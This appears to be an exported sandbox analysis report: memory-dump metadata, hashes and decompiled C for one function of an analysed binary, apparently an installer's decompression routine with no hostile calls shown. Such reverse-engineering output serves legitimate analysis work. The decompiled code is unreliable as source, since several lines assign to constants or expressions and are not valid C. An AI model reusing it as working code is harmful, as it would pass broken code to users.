                                                                                                                        0x004064dc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x00406722
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406728
                                                                                                                        0x0040672b
                                                                                                                        0x0040672e
                                                                                                                        0x00406731
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406736
                                                                                                                        0x00406739
                                                                                                                        0x0040673c
                                                                                                                        0x0040673f
                                                                                                                        0x00406742
                                                                                                                        0x00406745
                                                                                                                        0x00406746
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x0040674b
                                                                                                                        0x0040674e
                                                                                                                        0x00406751
                                                                                                                        0x00406754
                                                                                                                        0x00406757
                                                                                                                        0x0040675b
                                                                                                                        0x0040675d
                                                                                                                        0x00406760
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x004064df
                                                                                                                        0x004064df
                                                                                                                        0x00000000
                                                                                                                        0x004064df
                                                                                                                        0x00406760
                                                                                                                        0x00406995
                                                                                                                        0x004069b7
                                                                                                                        0x004069bd
                                                                                                                        0x004069bf
                                                                                                                        0x004069c6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4
                                                                                                                        0x004069cc
                                                                                                                        0x004069cc
                                                                                                                        0x00000000

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                                        • Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
                                                                                                                        • Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                                        • Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
